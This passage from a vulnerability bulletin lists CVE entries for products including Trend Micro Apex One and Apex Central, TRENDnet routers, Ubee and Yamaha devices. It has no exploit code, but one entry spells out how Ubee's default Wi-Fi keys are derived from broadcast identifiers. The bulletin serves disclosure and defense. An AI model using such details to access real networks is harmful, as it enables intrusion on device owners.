TRENDnet TEW-824DRU version 1.04b01 is vulnerable to Command Injection via the system.ntp.server in the sub_420AE0() function. | 2024-01-26 | not yet calculated | CVE-2024-22545 cve@mitre.org |
| treandnet –tew-824dru  |
An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2024-01-26 | not yet calculated | CVE-2024-22550 cve@mitre.org |
| trend_micro_inc. — trend_micro_apex_one  |
An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52091 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52092 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An exposed dangerous function vulnerability in the Trend Micro Apex One agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52093 security@trendmicro.com security@trendmicro.com |
| trend_micro,_inc. — trend_micro_apex_one  |
An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52094 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central | An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations. Please note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code. | 2024-01-23 | not yet calculated | CVE-2023-52324 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627. | 2024-01-23 | not yet calculated | CVE-2023-38624 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38624. | 2024-01-23 | not yet calculated | CVE-2023-38625 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625. | 2024-01-23 | not yet calculated | CVE-2023-38626 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38626. | 2024-01-23 | not yet calculated | CVE-2023-38627 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A local file inclusion vulnerability in one of Trend Micro Apex Central’s widgets could allow a remote attacker to execute arbitrary code on affected installations. Please note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52325 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52327. | 2024-01-23 | not yet calculated | CVE-2023-52326 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52328. | 2024-01-23 | not yet calculated | CVE-2023-52327 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52329. | 2024-01-23 | not yet calculated | CVE-2023-52328 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52326. | 2024-01-23 | not yet calculated | CVE-2023-52329 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A cross-site scripting vulnerability in Trend Micro Apex Central could allow a remote attacker to execute arbitrary code on affected installations of Trend Micro Apex Central. Please note: user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. | 2024-01-23 | not yet calculated | CVE-2023-52330 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_central  |
A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52331 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-47192 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47194. | 2024-01-23 | not yet calculated | CVE-2023-47193 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47195. | 2024-01-23 | not yet calculated | CVE-2023-47194 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47196. | 2024-01-23 | not yet calculated | CVE-2023-47195 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47197. | 2024-01-23 | not yet calculated | CVE-2023-47196 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47198. | 2024-01-23 | not yet calculated | CVE-2023-47197 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47199. | 2024-01-23 | not yet calculated | CVE-2023-47198 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47193. | 2024-01-23 | not yet calculated | CVE-2023-47199 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47201. | 2024-01-23 | not yet calculated | CVE-2023-47200 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47200. | 2024-01-23 | not yet calculated | CVE-2023-47201 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
A local file inclusion vulnerability on the Trend Micro Apex One management server could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-47202 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_apex_one  |
A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52090 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_deep_security_agent  |
An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52337 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_deep_security_agent  |
A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52338 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_mobile_security_for_enterprise  |
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41177. | 2024-01-23 | not yet calculated | CVE-2023-41176 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_mobile_security_for_enterprise  |
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41178. | 2024-01-23 | not yet calculated | CVE-2023-41177 security@trendmicro.com security@trendmicro.com |
| trend_micro_inc. — trend_micro_mobile_security_for_enterprise  |
Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41176. | 2024-01-23 | not yet calculated | CVE-2023-41178 security@trendmicro.com security@trendmicro.com |
| trendnet — tew-411brpplus  |
A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page. | 2024-01-25 | not yet calculated | CVE-2023-51833 cve@mitre.org cve@mitre.org |
| ubee — ddw365_xcnddw365 Â |
Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit. | 2024-01-21 | not yet calculated | CVE-2024-23726 cve@mitre.org |
| uniswapfrontrunbot — 0xdB94c  |
A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors. | 2024-01-19 | not yet calculated | CVE-2023-47034 cve@mitre.org cve@mitre.org |
| united_boxing_gym — mini-app_line  |
An issue in UNITED BOXING GYM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48128 cve@mitre.org |
| webcalendar — webcalendar  |
WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php. | 2024-01-25 | not yet calculated | CVE-2024-22635 cve@mitre.org |
| webkul — bundle  |
SQL injection vulnerability in Webkul Bundle Product 6.0.1 allows a remote attacker to execute arbitrary code via the id_product parameters in the UpdateProductQuantity function. | 2024-01-23 | not yet calculated | CVE-2023-51210 cve@mitre.org |
| webmin — webmin  |
Cross Site Scripting vulnerability (XSS) in webmin v.2.105 and earlier allows a remote attacker to execute arbitrary code via a crafted payload to the “Execute cron job as” tab Input field. | 2024-01-25 | not yet calculated | CVE-2023-52046 cve@mitre.org |
| whatacart — whatacart  |
WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search. | 2024-01-26 | not yet calculated | CVE-2024-22551 cve@mitre.org |
| yamaha_corporation — wlx222 Â |
Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device’s management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier. | 2024-01-24 | not yet calculated | CVE-2024-22366 vultures@jpcert.or.jp vultures@jpcert.or.jp |
| zoho — manageengine  |
Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal. | 2024-01-25 | not yet calculated | CVE-2023-50785 cve@mitre.org |